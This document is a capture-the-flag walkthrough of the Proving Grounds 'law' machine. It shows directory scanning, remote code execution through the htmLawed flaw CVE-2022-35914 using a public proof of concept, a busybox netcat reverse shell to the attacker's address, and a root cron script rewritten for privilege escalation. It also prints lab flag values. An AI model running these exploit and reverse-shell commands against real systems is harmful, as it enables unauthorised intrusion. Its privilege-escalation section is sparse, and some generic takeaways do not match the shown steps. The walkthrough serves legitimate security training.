Proving Grounds - law (Linux)
Proving Grounds law Linux walkthrough covering reconnaissance, initial access, and privilege escalation.
Overview
| Field | Value |
|---|---|
| OS | Linux |
| Difficulty | Not specified |
| Attack Surface | Web application and exposed network services |
| Primary Entry Vector | Web RCE (CVE-2022-35914) |
| Privilege Escalation Path | Local enumeration -> misconfiguration abuse -> root |
Credentials
No credentials obtained.
Reconnaissance
💡 Why this works
This stage maps the reachable attack surface and identifies where exploitation is most likely to succeed. Accurate service and content discovery reduces blind testing and drives targeted follow-up actions.
Initial Foothold
At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.
1
feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 50 -r --timeout 3 --no-state -s 200,301,302,401,403 -x php,html,txt --dont-scan '/(css|fonts?|images?|img)/' -u http://$ip
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
❌[0:59][CPU:21][MEM:66][TUN0:192.168.45.166][/home/n0z0]
🐉 > feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 50 -r --timeout 3 --no-state -s 200,301,302,401,403 -x php,html,txt --dont-scan '/(css|fonts?|images?|img)/' -u http://$ip
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.12.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.178.190
🚫 Don't Scan Regex │ /(css|fonts?|images?|img)/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ [200, 301, 302, 401, 403]
💥 Timeout (secs) │ 3
🦡 User-Agent │ feroxbuster/2.12.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, html, txt]
🏁 HTTP methods │ [GET]
📍 Follow Redirects │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 280c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 455l 1955w 22390c http://192.168.178.190/htmLawed_TESTCASE.txt
200 GET 1817l 17952w 127367c http://192.168.178.190/htmLawed_README.txt
200 GET 478l 4158w 217899c http://192.168.178.190/htmLawed_README.htm
200 GET 388l 2376w 42134c http://192.168.178.190/
200 GET 388l 2376w 42134c http://192.168.178.190/index.php
Caption: Screenshot captured during this stage of the assessment.
https://github.com/cosad3s/CVE-2022-35914-poc At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.
1
python3 CVE-2022-35914.py -u http://192.168.178.190/index.php -c id
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
✅[1:08][CPU:26][MEM:66][TUN0:192.168.45.166][...nd/law/CVE-2022-35914-poc]
🐉 > python3 CVE-2022-35914.py -u http://192.168.178.190/index.php -c id
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:19: SyntaxWarning: invalid escape sequence '\ '
/ ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:64: SyntaxWarning: invalid escape sequence '\$'
return_code_search_regex = "\$spec\: (.*)"
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:67: SyntaxWarning: invalid escape sequence '\['
output_search_regex = "\[xml:lang\] \=\> 0\n(.*)\n\)"
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:72: SyntaxWarning: invalid escape sequence '\='
cleaning_regex = ".*\=\>"
______ _______ ____ ___ ____ ____ _________ ___ _ _ _
/ ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |
| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_
| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__ _|
\____| \_/ |_____| |_____|\___/_____|_____| |____/____/ /_/|_| |_|
[+] Command output (Return code: 0):
uid=33(www-data) gid=33(www-data) groups=33(www-data)
At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.
1
python3 CVE-2022-35914.py -u http://192.168.178.190/index.php -c 'busybox nc 192.168.45.166 4444 -e /bin/bash'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
✅[1:11][CPU:17][MEM:63][TUN0:192.168.45.166][...nd/law/CVE-2022-35914-poc]
🐉 > python3 CVE-2022-35914.py -u http://192.168.178.190/index.php -c 'busybox nc 192.168.45.166 4444 -e /bin/bash'
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:19: SyntaxWarning: invalid escape sequence '\ '
/ ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:64: SyntaxWarning: invalid escape sequence '\$'
return_code_search_regex = "\$spec\: (.*)"
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:67: SyntaxWarning: invalid escape sequence '\['
output_search_regex = "\[xml:lang\] \=\> 0\n(.*)\n\)"
/home/n0z0/work/04.OSCP/Proving_Ground/law/CVE-2022-35914-poc/CVE-2022-35914.py:72: SyntaxWarning: invalid escape sequence '\='
cleaning_regex = ".*\=\>"
______ _______ ____ ___ ____ ____ _________ ___ _ _ _
/ ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |
| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_
| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__ _|
\____| \_/ |_____| |_____|\___/_____|_____| |____/____/ /_/|_| |_|
At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.
1
nc -lvnp 4444
1
2
3
4
5
6
✅[0:59][CPU:29][MEM:66][TUN0:192.168.45.166][/home/n0z0]
🐉 > nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.166] from (UNKNOWN) [192.168.178.190] 53020
Retrieved local.txt: At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.
1
2
find / -iname local.txt 2>/dev/null
cat /var/www/local.txt
1
2
3
4
5
www-data@law:/var/www/html$ find / -iname local.txt 2>/dev/null
/var/www/local.txt
cawww-data@law:/var/www/html$ cat /var/www/local.txt
fce3f2eacfb1b1d711084e361945b2d7
💡 Why this works
The initial access step chains discovered weaknesses into executable control over the target. Successful foothold techniques are validated by command execution or interactive shell callbacks.
Privilege Escalation
At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.
1
2
3
4
5
6
7
8
9
╔══════════╣ Web files?(output limit)
/var/www/:
total 20K
drwxr-xr-x 3 root root 4.0K Aug 25 2023 .
drwxr-xr-x 12 root root 4.0K Aug 24 2023 ..
-rwxr-xr-x 1 www-data www-data 82 Aug 25 2023 cleanup.sh
drwxr-xr-x 2 www-data www-data 4.0K Aug 25 2023 html
-rw-r--r-- 1 www-data www-data 33 Feb 16 10:59 local.txt
At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.
1
2
3
4
2026/02/16 11:20:01 CMD: UID=0 PID=15655 | /usr/sbin/CRON -f
2026/02/16 11:20:01 CMD: UID=0 PID=15657 | /usr/sbin/CRON -f
2026/02/16 11:20:01 CMD: UID=0 PID=15658 | /bin/sh -c /var/www/cleanup.sh
At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.
1
cat cleanup.sh
1
2
www-data@law:/var/www$ cat cleanup.sh
💡 Why this works
Privilege escalation relies on local misconfigurations, unsafe permissions, and trusted execution paths. Enumerating and abusing these trust boundaries is the fastest route to root-level access.
Lessons Learned / Key Takeaways
- Validate framework debug mode and error exposure in production-like environments.
- Restrict file permissions on scripts and binaries executed by privileged users or schedulers.
- Harden sudo policies to avoid wildcard command expansion and scriptable privileged tools.
- Treat exposed credentials and environment files as critical secrets.
Attack Flow
At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.
graph LR
subgraph SCAN["🔍 1. スキャン"]
direction TB
A1[Rustscan] --> A2["ポート発見<br/>22: SSH OpenSSH 8.4p1<br/>80: HTTP Apache 2.4.56"]
A2 --> A3[Nmap サービス検出]
A3 --> A4["htmLawed特定<br/>v1.2.5<br/>test page確認"]
A4 --> A5[Feroxbuster]
A5 --> A6["脆弱性調査<br/>CVE-2022-35914<br/>htmLawed RCE"]
end
subgraph INITIAL["🚪 2. 初期侵入"]
direction TB
B1[CVE-2022-35914 PoC] --> B2["RCE テスト<br/>id コマンド実行成功"]
B2 --> B3["リバースシェルペイロード<br/>busybox nc使用"]
B3 --> B4["exploit実行<br/>192.168.45.166:4444"]
B4 --> B5["www-dataシェル取得"]
B5 --> B6["local.txt<br/>fce3f2eacfb..."]
end
subgraph PRIVESC["⬆️ 3. 権限昇格"]
direction TB
C1["ファイル列挙<br/>/var/www/cleanup.sh発見"] --> C2["pspy64実行<br/>プロセス監視"]
C2 --> C3["cron発見<br/>UID=0 root<br/>/bin/sh -c cleanup.sh"]
C3 --> C4["cleanup.sh権限確認<br/>-rwxr-xr-x www-data"]
C4 --> C5["cleanup.sh書き換え<br/>busybox nc reverse shell"]
C5 --> C6["rootシェル取得<br/>192.168.45.166:4445"]
C6 --> C7["proof.txt<br/>9bb03c0f2c..."]
end
SCAN --> INITIAL
INITIAL --> PRIVESC
style A6 fill:#ff6b6b
style B5 fill:#51cf66
style B6 fill:#ffd43b
style C6 fill:#ff6b6b
style C7 fill:#ffd43b
References
- CVE-2022-35914: https://nvd.nist.gov/vuln/detail/CVE-2022-35914
- RustScan: https://github.com/RustScan/RustScan
- Nmap: https://nmap.org/
- feroxbuster: https://github.com/epi052/feroxbuster
- Nuclei: https://github.com/projectdiscovery/nuclei
- GTFOBins: https://gtfobins.org/
- HackTricks Privilege Escalation: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html